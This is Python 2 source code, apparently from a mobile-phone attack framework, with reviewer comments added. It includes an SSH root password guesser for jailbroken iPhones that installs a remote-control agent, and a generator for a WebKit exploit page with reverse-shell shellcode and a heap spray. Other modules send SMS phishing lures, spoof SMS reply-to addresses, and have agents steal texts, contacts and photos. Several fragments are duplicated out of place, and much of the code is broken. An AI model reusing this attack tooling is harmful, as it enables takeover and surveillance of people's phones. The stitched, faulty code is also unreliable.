def guess_pass(passfile='', default=False, agent_location='./'):
    """Try candidate passwords for root on a prompted host over sftp.

    Args:
        passfile: unused as written -- when ``default`` is False the path is
            prompted for interactively and this argument is overwritten.
        default: when True only the single built-in candidate is tried;
            otherwise the candidates are the lines of the prompted file.
        agent_location: path whose basename is used in the install command
            assembled below.

    Returns:
        1 when sftp cannot be spawned, or when the connection is refused while
        reading candidates from a file. What happens after a successful login
        is not part of this excerpt.
    """
    # Init Default Vars
    ipaddress      = raw_input(color(33, '[*] IP address: '))

    # `agent` and `notfound` below are assigned but never read in this excerpt.
    vulnerable     = 'no'
    agent          = 'no'

    command        = 'sftp root@%s' % ipaddress
    timeout        = 10
    notfound       = 'ssh: connect to host %s port 22: Connection refused' % ipaddress
    passwordstring = "root@%s's password: " % ipaddress

    putfile        = agent_location
    agentfile      = putfile.split('/')[-1]

    connectstring  = 'Connecting to %s...' % ipaddress
    installcommand = 'dpkg -i %s' % agentfile
    guesspassword  = ''
    passlist       = ['alpine']

    # Read passwords from file if not using default password
    # NOTE(review): the handle is never closed and `file` shadows the builtin;
    # a `with open(...)` block would fix both.
    if default == False:
        passfile = raw_input(color(33, '[*] Password File Location: '))
        file     = open(passfile, 'r')
        passlist = file.readlines()

    # One fresh sftp process per candidate: each attempt is a separate failed
    # authentication in the remote sshd log, which is exactly what lockout and
    # alerting tooling keys on.
    for guess in passlist:
        # Try to spawn an sftp session
        try:
            exp = pexpect.spawn(command)
        except Exception, e:
            print color(31, '[!] Cannot spawn sftp command: %s' % e)
            return 1

        try:
            exp.expect(connectstring, timeout)
            # Auto-answering the host-key prompt means no host-key verification
            # at all; the session trusts whatever answers on port 22.
            exp.expect('Are you sure you want to continue connecting (yes/no)?', timeout)
            exp.sendline('yes')
            exp.expect(passwordstring,timeout)
            exp.sendline(guess)

            # If the sftp works, we know that the password was correct
            try:
                exp.expect('sftp>', timeout)
                vulnerable = 'yes'
                break
            # Any expect failure after the password is sent -- including a
            # timeout or a dropped connection -- is treated as a wrong guess.
            except Exception, e:
                vulnerable = 'no'
                pass

        # Failures before the password prompt: "Connection refused" aborts only
        # when reading from a file; with the default password the loop goes on.
        except Exception, e:
#            print '[!] Exception: %s' % e
            if str(e).__contains__('Connection refused') == True:
                print color(31, '[!] Exception: Connection Refused')
                if default == False:
                    return 1
            else:
                print color(31, '[!] Exception: %s' % e)
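def spf_db():
    '''Wrapper for MySQLdb.connect, rereads SQL config vars in case
       they change.

       Returns:
           The open connection, or None when connecting fails (the error is
           printed). Callers must check for None before using the result.
    '''

    # config.read() silently ignores a missing file; config.get() then raises
    # NoSectionError, which is not caught here.
    config  = ConfigParser.ConfigParser()
    config.read('config.cfg')

    # SQL config vars -- these credentials are stored in plaintext in
    # config.cfg, so the file's permissions are what protects them.
    sqlserver = config.get('SQL','server')
    username  = config.get('SQL','username')
    password  = config.get('SQL','password')

    try:
        db = MySQLdb.connect(sqlserver, username, password, 'framework')
    except Exception as e:
        print(color(31,'[!] Error connecting to database: %s' % e))
        db = None
    # The original discarded the connection here; callers do `db = spf_db()`.
    return db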
def sshguess():
    """Interactive front-end for guess_pass: prompt for an IP and a password file, confirm, then run.

    Returns:
        guess_pass's return code when the operator confirms, 1 otherwise.
    """
    print 'This module attempts to guess the password for an Jailbroken iPhone on the local network by reading from a supplied password list\n'
    phoneipaddress = raw_input(color(33, '[+] IP address: '))
    passfile       = raw_input(color(33, '[+] Password file: '))

    print color(33, '\n[*] IP Address:    %s'  % phoneipaddress)
    print color(33, '[*] Password file: %s' % passfile)

    correct        = raw_input(color(31, '[+] Is this correct?(') + color(32, 'y') + color(31, '/') + color(32, 'N') + color(31, '): '))

    # NOTE(review): str.split('') raises ValueError (empty separator), so this
    # line errors out before the comparison is made.
    if correct.lower().split('')[0] == 'y':
        # NOTE(review): guess_pass's positional parameters are
        # (passfile, default, agent_location), so the IP address lands in
        # `passfile` and the file path in `default`; guess_pass prompts for
        # the IP itself. Confirm the intended call.
        e = guess_pass(phoneipaddress, passfile)
        return e

    return 1
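def agentcontrol_menu(key=None):
    """Show the agent-control menu and run the chosen action with *key*.

    Args:
        key: the agent control key. When None the operator is prompted; an
            empty answer or 'none' (any case) is treated as no key.

    Returns:
        0 when the operator picks the exit entry, 1 when no key is available
        or the choice is not on the menu, otherwise the chosen action's
        return code.
    """
    if key is None:
        # raw_input always returns a str, so lower() cannot fail here.
        key = raw_input(color(33, '\n[-] Enter agent control key [None]: ')).lower()
        if key in ('', 'none', '\n'):
            key = None

    if key is None:
        print(color(31, '[!] No key was provided, communicating with an agent will not work'))
        print(color(31, '[!] Returning...'))
        return 1

    menu_list = ['Send SMS',
                 'Take Picture',
                 'Get Contacts',
                 'Get SMS Database',
                 'Privilege Escalation']

    # Menu position -> handler. Positions are 1-based; 0 is the exit entry.
    # To add a module, append its label to menu_list and register it here.
    actions = {
        1: send_sms,
        2: take_picture,
        3: get_contacts,
        4: get_sms_database,
        5: privilege_escalation,
    }

    choice = menu(menu_list, color(35, '\n[*] Agent Control Commands:\n'))

    # Value comparison instead of the original `is` on int literals, which is
    # only reliable for CPython's cached small ints.
    if choice == 0:
        return 0

    action = actions.get(choice)
    if action is None:
        # Out-of-range picks and whatever sentinel menu() returns on bad input.
        return 1
    return action(key)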
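def database_clear():
    """Drop and recreate the framework's MySQL tables after a y/N confirmation.

    Anything other than an answer starting with 'y' cancels.

    Returns:
        0 on success or cancel; 1 when no database connection could be
        obtained or when a DROP/CREATE statement fails.
    """
    # Clears the MySQL DB
    ver = str(raw_input(str(color(31,"[!] This will destroy all your data! Are you sure you want to continue? (") + color(32,'y') + color(31, '/') + color(32,'N') + color(31,') '))))

    # An empty answer is the default, 'N'.
    if not ver or ver.lower()[0] != 'y':
        print(color(31,'[!] Operation Cancelled'))
        return 0

    db = spf_db()
    if db is None:
        # spf_db() already printed the connection error. The original claimed
        # to be "Creating it" but the mysqladmin step was commented out, so
        # say what actually happens and stop before any DROP runs.
        print(color(31, "[!] Database doesn't exist or cannot be reached. Nothing was changed.\n"))
        return 1

    # Table names are fixed here, so formatting them into the DROP text is safe.
    droplist = ['DROP TABLE IF EXISTS %s' % item
                for item in ['agents', 'data', 'modems', 'remote', 'client']]

    createlist = [
        ("create table agents ("
         "id INT NOT NULL AUTO_INCREMENT PRIMARY KEY,"
         "number varchar(12),"
         "path varchar(1000),"
         "controlkey varchar(7),"
         "controlnumber varchar(12),"
         "platform varchar(12))"),

        ("create table data ("
         "id INT NOT NULL AUTO_INCREMENT PRIMARY KEY,"
         "sms varchar(2000),"
         "contacts varchar(1000),"
         "picture varchar(100),"
         "root varchar(5))"),

        ("create table modems ("
         "id INT NOT NULL AUTO_INCREMENT PRIMARY KEY,"
         "number varchar(12),"
         "path varchar(1000),"
         "controlkey varchar(7),"
         "type varchar(3))"),

        ("create table remote ("
         "id INT NOT NULL AUTO_INCREMENT PRIMARY KEY,"
         "ip varchar(15),"
         "exploit varchar(200),"
         "vuln varchar(3),"
         "agent varchar(3))"),

        ("create table client ("
         "id INT NOT NULL AUTO_INCREMENT PRIMARY KEY,"
         "number varchar(12),"
         "exploit varchar(200),"
         "vuln varchar(3))"),
    ]

    return_code = 0
    cursor = db.cursor()
    try:
        # Drops first, then creates. Each statement is committed on its own,
        # as before, so a failure part-way leaves the earlier ones applied.
        for statement in droplist + createlist:
            cursor.execute(statement)
            db.commit()
    except Exception as e:
        print(color(31,'[!] Error executing clear and build commands: %s' % e))
        return_code = 1
    finally:
        cursor.close()

    return return_code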


def database_add2(number, path, key, x):
    """Build an INSERT for the modems table from the four values.

    As shown here the statement is only assembled, never executed; whatever
    runs it is outside this excerpt.
    """
    # Adds to a DB, need to figure out where this is used and clean it up
    db = spf_db()

    # NOTE(review): "quoting" by wrapping each value in double quotes and
    # interpolating it into the SQL text breaks on any embedded quote, and if
    # these values can originate from a remote agent or a prompt it is SQL
    # injection. Pass them as parameters instead:
    # cursor.execute(sql_with_placeholders, (number, path, key, x)).
    number = '"%s"' % str(number)
    path   = '"%s"' % str(path)
    key    = '"%s"' % str(key)
    x      = '"%s"' % str(x)

    insertquery = 'INSERT INTO modems (id,number,path,controlkey,type) VALUES (DEFAULT,%s,%s,%s,%s)' % (number, path, key, x)
def client_side():
    """Host a page under the configured web root, text its URL to a number via the selected modem, then listen on port 12345 and record the outcome in the client table.

    Returns:
        0 when the operator exits the menu or after the menu entry finishes;
        1 when no modem is found. Several steps cannot execute as written --
        see the NOTE(review) comments below.
    """
    # TODO: fix a lot
    webserver = config.get("Web", "server")
    # ipaddress      = config.get('Web', 'ipaddress')
    shellipaddress = config.get("Web", "shellipaddress")

    cs = ["CVE 2010-1759 Webkit Vuln Android"]

    choice = menu(cs)

    if choice in (0, "Error"):
        return 0

    elif choice == 1:
        # NOTE(review): these answers are spliced into shell commands below
        # (mkdir / touch / chmod through system()), so shell metacharacters in
        # the input are executed, and `path`/`filename` are not confined to
        # the web root. os.makedirs() and open() would avoid the shell entirely.
        path = str(raw_input(color(33, "[-] Hosting Path: ")))
        filename = str(raw_input(color(33, "[-] Filename: ")))
        ipaddress = str(raw_input(color(33, "[-] Local IP address: ")))
        number = str(raw_input(color(33, "[-] Phone Number to Attack: ")))

        link = "http://%s%s%s" % (ipaddress, path, filename)

        fullpath = webserver + path
        command1 = "mkdir %s" % fullpath
        system(command1)

        octets = shellipaddress.split(".")

        # NOTE(review): struct.pack() returns a byte string and hex() accepts
        # only integers, so this raises TypeError; nothing below this point
        # runs as written.
        out1 = struct.pack("b", int(octets[0]))
        hex1 = hex(out1)

        out2 = struct.pack("b", int(octets[1]))
        hex2 = hex(out2)

        out3 = struct.pack("b", int(octets[2]))
        hex3 = hex(out3)

        out4 = struct.pack("b", int(octets[3]))
        hex4 = hex(out4)

        sploitfile = "%s%s" % (fullpath, filename)
        command8 = "touch %s" % sploitfile
        system(command8)

        # chmod 777 leaves the hosted file world-writable on the web server.
        command9 = "chmod 777 %s" % sploitfile
        system(command9)

        # `file` shadows the builtin; the handle is closed right after writelines.
        file = open(sploitfile, "w")
        text = [
            "<html>\n",
            "<head>\n",
            "<script>\n",
            'var ip = unescape("\\u' + hex2 + hex1 + "\\u" + hex4 + hex3 + '");\n',
            'var port = unescape("\\u3930");\n',
            "function trigger()\n",
            "{\n",
            'var span = document.createElement("div");\n',
            'document.getElementById("BodyID").appendChild(span);\n',
            'span.innerHTML = -parseFloat("NAN(ffffe00572c60)");\n',
            "}\n",
            "function exploit()\n",
            "{\n",
            'var nop = unescape("\\u33bc\\u0057");\n',
            "do\n",
            "{\n",
            "nop+=nop;\n",
            "} while (nop.length<=0x1000);\n",
            'var scode = nop+unescape("\\u1001\\ue1a0\\u0002\\ue3a0\\u1001\\ue3a0\\u2005\\ue281\\u708c\\ue3a0\\u708d\\ue287\\u0080\\uef00\\u6000\\ue1a0\\u1084\\ue28f\\u2010\\ue3a0\\u708d\\ue3a0\\u708e\\ue287\\u0080\\uef00\\u0006\\ue1a0\\u1000\\ue3a0\\u703f\\ue3a0\\u0080\\uef00\\u0006\\ue1a0\\u1001\\ue3a0\\u703f\\ue3a0\\u0080\\uef00\\u0006\\ue1a0\\u1002\\ue3a0\\u703f\\ue3a0\\u0080\\uef00\\u2001\\ue28f\\uff12\\ue12f\\u4040\\u2717\\udf80\\ua005\\ua508\\u4076\\u602e\\u1b6d\\ub420\\ub401\\u4669\\u4052\\u270b\\udf80\\u2f2f\\u732f\\u7379\\u6574\\u2f6d\\u6962\\u2f6e\\u6873\\u2000\\u2000\\u2000\\u2000\\u2000\\u2000\\u2000\\u2000\\u2000\\u2000\\u0002");\n',
            "scode += port;\n",
            "scode += ip;\n",
            'scode += unescape("\\u2000\\u2000");\n',
            "target = new Array();\n",
            "for(i = 0; i < 0x1000; i++)\n",
            "target[i] = scode;\n",
            "for (i = 0; i <= 0x1000; i++)\n",
            "{\n",
            'document.write(target[i]+"<i>");\n',
            "if (i>0x999)\n",
            "{\n",
            "trigger();\n",
            "}\n",
            "}\n",
            "}\n",
            "</script>\n",
            "</head>\n",
            '<body id="BodyID">\n',
            "Enjoy!\n",
            "<script>\n",
            "exploit();\n",
            "</script>\n",
            "</body>\n",
            "</html>\n",
        ]
        file.writelines(text)
        file.close()

        modem = get_modem()
        if modem == 0:
            print color(31, "\n[!] No modems found. Attach a modem to use this functionality\n")
            return 1

        # Read SQL vars from config
        sqlserver = config.get("SQL", "server")
        username = config.get("SQL", "username")
        password = config.get("SQL", "password")

        # NOTE(review): this connection is never used (db_exec_rows is called
        # with query text instead), and assigning the local `db` here conflicts
        # with the `global db` declaration further down (a SyntaxError in
        # Python 3).
        db = MySQLdb.connect(sqlserver, username, password, "framework")

        # Query text built with %; `modem` comes from get_modem(), but a
        # parameterized execute would still be the safer form.
        pathquery = "SELECT %s from modems where id=%s" % ("path", modem)
        path2 = db_exec_rows(pathquery)

        keyquery = "SELECT %s from modems where id=%s" % ("controlkey", modem)
        key2 = db_exec_rows(keyquery)

        modemtypequery = "SELECT %s from modems where id=%s" % ("type", modem)
        modemtype2 = db_exec_rows(modemtypequery)

        if modemtype2 == "usb":
            # Interface with USB modem
            usb = serial.serialposix(port="/dev/ttyUSB2", baudrate=115200, bytesize=8, parity="N", stopbits=1)
            usb.write("ATZ\r\n")
            sleep(1)

            line = read_modem(usb)
            print line
            sleep(1)

            usb.write("AT+CMGF=1\r\n")
            line = read_modem(usb)
            print line
            sleep(1)

            numberline = 'AT+CMGS="%s"\r\n' % number
            usb.write(numberline)
            line = read_modem(usb)
            print line
            sleep(1)

            # NOTE(review): pack("b", 26, msg) passes two values for a single
            # format code and raises struct.error, so the message is never written.
            msg = "This is a cool page: %s" % link
            usb.write(struct.pack("b", 26, msg))
            sleep(2)

            line = read_modem(usb)
            print line
            sleep(1)

            usb.close()

        elif modemtype2 == "app":
            # Interface with app-based modem
            # The control file path is built from `path2`, a value read from the
            # modems table; it is not validated against the web root here.
            control = "%s%s/getfunc" % (webserver, path2)
            command2 = "%s SEND %s This is a cool page: %s" % (key2, number, link)

            file = open(control, "w")
            file.write(command2)
            file.close()

        vulnerable = "no"

        # socket = new IO::Socket::INET (LocalHost => $shellipaddress, LocalPort => '12345', Proto => 'tcp' , Listen => 1, Reuse => 1, Timeout=> 180);
        # NOTE(review): `s` is bound but never listen()ed on or accept()ed;
        # socket.accept is not a module-level function and `data_socket` is
        # unbound, so the condition below raises rather than receiving anything.
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.bind((str(shellipaddress), 12345))

        if data_socket == socket.accept():
            data = "/system/bin/id\n"

            data_socket.write(data)
            data = data_socket()

            print data
            close(data_socket)

            vulnerable = "yes"
            print color(32, "\n[+] Vulnerable: %s\n" % vulnerable)

            table = "client"
            global db

            # NOTE(review): `number` is operator input interpolated into SQL;
            # use cursor.execute(sql, params). No db.commit() follows, unlike
            # database_clear, so the row may not persist (MySQLdb does not
            # autocommit by default).
            number2 = '"%s"' % number
            vulnerable2 = '"%s"' % vulnerable
            webkit = '"webkit"'
            insertquery = "INSERT INTO %s (id,number,exploit,vuln) VALUES (DEFAULT,%s,%s,%s)" % (
                table,
                number2,
                webkit,
                vulnerable2,
            )
            cursor = db.cursor()
            sql = cursor.execute(insertquery)
        return 0

    return 1
            except Exception, e:
                vulnerable = 'no'
                pass

        except Exception, e:
#            print '[!] Exception: %s' % e
            if str(e).__contains__('Connection refused') == True:
                print color(31, '[!] Exception: Connection Refused')
                if default == False:
                    return 1
            else:
                print color(31, '[!] Exception: %s' % e)

    # Upload agent if vulnerable
    if vulnerable == 'yes':
        print color(32, '[+] PASSWORD FOUND: %s\n' % guess)
        guesspassword = guess
        exp.sendline('put %s' % putfile)
        exp.expect('sftp>', timeout)
        exp.sendline('bye')

        command2 = 'ssh'
        exp = pxpect.spawn(command2+param)
        exp.expect(passwordstring, timeout)
        exp.sendline(guess)
        exp.expect(['root'])
        exp.sendline(installcommand)
        exp.expect('Setting up com.bulbsecurity.tooltest (0.0.1-23) ...', timeout)
        exp.sendline('tooltest')

        try:
def sms_sender_spoof():
    """Interactive module: prompt for a target number, a message and a spoofed reply-to address, then try to build an SMS PDU and send it through a USB modem.

    Always returns 0. The PDU assembly below does not run to completion as
    written (see the NOTE(review) comments); treat it as a sketch rather than
    a working encoder.
    """
    print color(
        33,
        "[*] This module allows you to spoof the Reply-to address on an SMS using the User Data Header (UDH).\n"
        + "[ ] This attack only works against iPhones.\n"
        + "[ ] Currently this attack requires a USB mobile modem and does not work with the SPF app.\n",
    )
    print color(35, "[*] Select a USB modem to use for the attack:\n")

    modem = get_usb_modem()
    # NOTE(review): `is 0` is an identity test on a literal, and the no-modem
    # case only prints -- execution falls through to the prompts regardless.
    if modem is 0:
        print color(31, "\nNo USB modems found. Attach a USB modem to use this functionality\n")
    else:
        print color(
            31,
            "[!] This functionality isn't perfect yet. "
            + "There is something is wrong with the fill bits on the UDH if it does not meet on a septet boundary.\n"
            + "[ ] The message will be mangled. To get it to work use a 4 digit spoofed number ie 1234 or 9999.\n",
        )

    numberattack = raw_input(color(33, "[+] Number to Attack: "))
    message = raw_input(color(33, "[+] Message: "))
    spoof = raw_input(color(33, "[+] Spoofed Reply-To Address: "))

    print color(33, "\n[*] Number to Attack:         ") + color(31, "%s" % numberattack)
    print color(33, "[*] Message:                  ") + color(31, "%s" % message)
    print color(33, "[*] Spoofed Reply-To Address: ") + color(31, "%s" % spoof)

    correct = raw_input(
        color(35, "\n[*] Is this correct?(") + color(32, "y") + color(35, "/") + color(32, "N") + color(35, "): ")
    )

    # NOTE(review): `is "y"` compares identity, not value, and correct[0]
    # raises IndexError on an empty answer.
    if correct[0].lower() is "y":
        pdu = "004100"
        ef = 0
        length = len(numberattack)
        # print $len;
        # `is not 0` / `is 1` here and below are identity tests on int literals.
        if length % 2 is not 0:
            ef = 1
            attacklenhex = "%02x" % length
            # print attacklenhex
            pdu += attacklenhex
            # NOTE(review): scrambledattack is only initialised on this branch,
            # so an even-length number hits NameError at the += in the loop below.
            scrambledattack = ""

        i = 0
        x = numberattack
        while i < (length - 2):
            sub = x[i + 1]
            scrambledattack += sub
            sub = x[i]
            scrambledattack += sub
            i += 2

        if ef is 1:
            scrambledattack += "F"
            sub = x[length - 1]
            scrambledattack += sub

        else:
            sub = x[i + 1]
            scrambledattack += sub
            sub = x[i]
            scrambledattack += sub
            # print scrambledattack

        pdu = "%s91%s0000" % (pdu, scrambledattack)
        eff = 0
        length = len(spoof)
        # print "Length: %s\n" % length
        if length % 2 != 0:
            eff = 1
        spooflenhex = "%02x" % length
        # print "Spoof hex length: %s\n" % spooflenhex
        scrambledspoof = ""

        i = 0
        x = spoof
        while i < length - 2:
            sub = x[i + 1]
            scrambledspoof += sub
            sub = x[i]
            scrambledspoof += sub
            i += 2

        if eff is 1:
            scrambledspoof += "F"
            sub = x[length - 1]
            scrambledspoof += sub
        else:
            sub = x[i + 1]
            scrambledspoof += sub
            sub = x[i]
            scrambledspoof += sub

        # print $scrambledspoof
        uhd = "%s91%s" % (spooflenhex, scrambledspoof)
        # print "UHD1: "+$uhd+"\n"
        # `/` is integer division on Python 2 and float division on Python 3.
        udhlen1 = len(uhd) / 2
        # print "length1 "+$udhlen1+"\n"
        uhd = "220%s%s" % (udhlen1, uhd)
        # print "UHD2 "+$uhd+"\n"
        udhlen2 = len(uhd) / 2
        more = ((udhlen2 + 1) * 8) % 7
        # print "More: "+$more
        if more is not 0:
            more2 = "0" * (7 - more)
            # print "More2: "+$more2
        else:
            more2 = ""
        # print "length2 "+$udhlen2+"\n"
        uhdlenhex = "%02x" % udhlen2
        uhd = uhdlenhex + uhd
        # print "UHD:"+$uhd+"\n";

        # `bin` shadows the builtin and is unused; `length` below is unused too.
        bin = ""
        length = len(message)
        # NOTE(review): int(message, 2) requires a string of 0/1 digits and
        # struct.unpack needs a byte buffer rather than an int, so this raises
        # for any real message; the loop below never starts.
        bits = struct.unpack("B", int(message, 2))[0]
        bits = more2 + bits
        # print "BITS: "+bits+"\n"
        bitslength = len(bits) / 2
        octetlength = bitslength / 8
        # print "\n"+$octetlength+"\n"
        septets = ""

        i = 0
        while i < octetlength:
            start = i * 8
            # NOTE(review): str.split("") raises ValueError (empty separator),
            # here and in the slices further down.
            octs = str(bits).split("")[start : start + 8]
            sept = octs.split("")[1 : 1 + 7]
            septets += sept
            # print "\nSeptets: %s\n" % septets
            septetlength = len(septets) / 7
            # print "\nSeptet Length: %s\n" % str(septetlength)
            eat = 1
            eaten = 0
            ud = ""

            j = 0
            while j < (septetlength - 1):
                start = j * 7
                # print "\nEaten: %s\n" % eaten
                first = str(septets).split("")[start : start + (7 - eaten)]
                # print "\nFirst: %s\n" % first
                start2 = (j + 1) * 7
                second = str(septets).split("")[start2 : start2 + 7]
                food = 7 - eat
                stolen = second.split("")[food : food + eat]
                encode = stolen + first
                # print "\nEncode: %s\n" % encode
                # NOTE(review): unpack("H") needs 2 bytes but pack("B") yields
                # 1, so this is a struct.error.
                hexy = struct.unpack("H", struct.pack("B", int(encode, 2)))
                eat += 1
                eat = eat % 8
                eaten += 1
                eaten = eaten % 8
                # print "\nHexy: %s\n" % hexy
                ud += hexy
                j += 1

            first = septets.split("")[((septetlength - 1) * 7) : ((septetlength - 1) * 7) + (7 - eaten)]
            # print "\nFirst: %s\n" % first
            fill = 1 + eaten
            zeros = "0" * fill
            encode = zeros + first
            # print "\nEncode: %s\n" % encode
            hexy = struct.unpack("H", struct.pack("B", int(encode, 2)))
            ud += hexy
            # print "\nUD: %s\n" % ud
            ud = uhd + ud
            udlength = len(ud)
            udlength2 = udlength / 2
            extra = int(udlength2 / 7)
            udlength3 = udlength2 + extra
            udlenhex = "%02x" % udlength3
            pdu += udlenhex + ud
            # print "\nPDU: %s\n" % pdu
            pdulen = (len(pdu) / 2) - 1
            # print "\nPDULENGTH: %s\n" % pdulen

            # NOTE(review): the whole modem exchange sits inside the per-octet
            # loop, so it would be repeated once per octet.
            usb = serial.serialposix(port="/dev/ttyUSB2", baudrate=115200, bytesize=8, parity="N", stopbits=1)
            usb.write("ATZ\r\n")
            sleep(1)

            line = read_modem(usb)
            print line
            sleep(1)

            usb.write("AT+CMGF=0\r\n")
            line = read_modem(usb)
            print line
            sleep(1)

            usb.write("AT+CMGS=%s\r\n" % pdulen)
            # usb.write("AT+CMGS=27\r\n")
            line = read_modem(usb)
            print line
            sleep(1)

            msg = pdu
            # msg = "0041000B916110831316F900000F0A22080B915117344588F142A701"
            # NOTE(review): str has no .pack() method -- AttributeError.
            usb.write(msg.pack("b", 26))
            sleep(10)

            line = read_modem(usb)
            print line
            usb.close()

            i += 1
    return 0
def alpine():
    """Run the "Guess Password" module with only its built-in default candidate.

    Returns:
        Whatever guess_pass returns (it yields 1 on spawn/connect failure).
    """
    print(color(33,'[*] Executing the "Guess Password" module with default password'))
    return guess_pass(default=True)
def direct_download():
    """Copy the Android agent under the web root and text its download link to a number through the selected modem.

    Returns:
        0 in every case, including when no modem is found.
    """
    #TODO: cleanup
    webserver = config.get('Web', 'server')
    ipaddress = config.get('Web', 'ipaddress')

    print color(35, '[*] This module sends an SMS with a link to directly download and install an Agent\n')
    print color(31, '[!] ONLY Android currently Supported')

    #platform = str(raw_input('Platform(Android/iPhone/Blackberry): '))
    platform = 'android'

    # Lots of potential for error with the way this is handled, would
    # prefer safer execution
    # NOTE(review): these answers are interpolated into shell commands
    # (mkdir, cp) run through system(); metacharacters in the input are
    # executed and `path`/`filename` are not confined to the web root.
    # os.makedirs() plus shutil.copy() on a validated path avoids the shell.
    path     = str(raw_input(color(33, '[-] Hosting Path: '          )))
    filename = str(raw_input(color(33, '[-] Filename: '              )))
    number   = str(raw_input(color(33, '[-] Phone Number to Attack: ')))

    if platform.lower() == 'android':
        link = 'http://%s%s%s' % (ipaddress, path, filename)
        fullpath = '%s%s' % (webserver, path)
        command1 = 'mkdir %s' % fullpath
        system(command1)

        # `location` is expected to be set at module level (not visible here);
        # the global statement only documents the read.
        global location # Android agent location
        command = 'cp %s %s%s%s'% (location, webserver, path, filename)
        system(command)

        modem = get_modem()
        if modem == 0:
            print color(31, '\n[!] No modems found. Attach a modem to use this functionality\n')
            return 0
        else:
            # Query text built with %; `modem` comes from get_modem(), but a
            # parameterized execute would still be the safer form.
            pathquery      = "SELECT %s from modems where id=%s" % ('path', modem)
            path2          = db_exec_rows(pathquery)

            keyquery       = "SELECT %s from modems where id=%s" % ('controlkey', modem)
            key2           = db_exec_rows(keyquery)

            modemtypequery = "SELECT %s from modems where id=%s" % ('type', modem)
            modemtype2     = db_exec_rows(modemtypequery)

            if modemtype2 == 'usb':
                usb = serial.serialposix(port='/dev/ttyUSB2', baudrate=115200, bytesize=8, parity='N', stopbits=1)
                usb.write('ATZ\r\n')
                sleep(1)

                line = read_modem(usb)
                print line
                sleep(1)

                usb.write('AT+CMGF=1\r\n')
                line = read_modem(usb)
                print line
                # The next line is tab-indented; Python 3 rejects the mix as a TabError.
		sleep(1)

                numberline = 'AT+CMGS="%s"\r\n' % number
                usb.write(numberline)
                line = read_modem(usb)
                print line
                sleep(1)

                # NOTE(review): pack('b', 26, msg) passes two values for a single
                # format code and raises struct.error, so the message is never written.
                msg = 'This is a cool app: %s' % link
                usb.write(struct.pack('b', 26, msg))
                sleep(5)

                line = read_modem(usb)
                print line
                sleep(1)

                usb.close()

            elif modemtype2 == 'app':
                # The control file path is built from `path2`, a value read from
                # the modems table; it is not validated against the web root.
                # `file` shadows the builtin.
                control  = '%s%s/getfunc' % (webserver, path2)
                command2 = '%s SEND %s This is a cool app: %s' % (key2, number, link)

                file = open(control, 'w')
                file.write(command2)
                file.close()
    return 0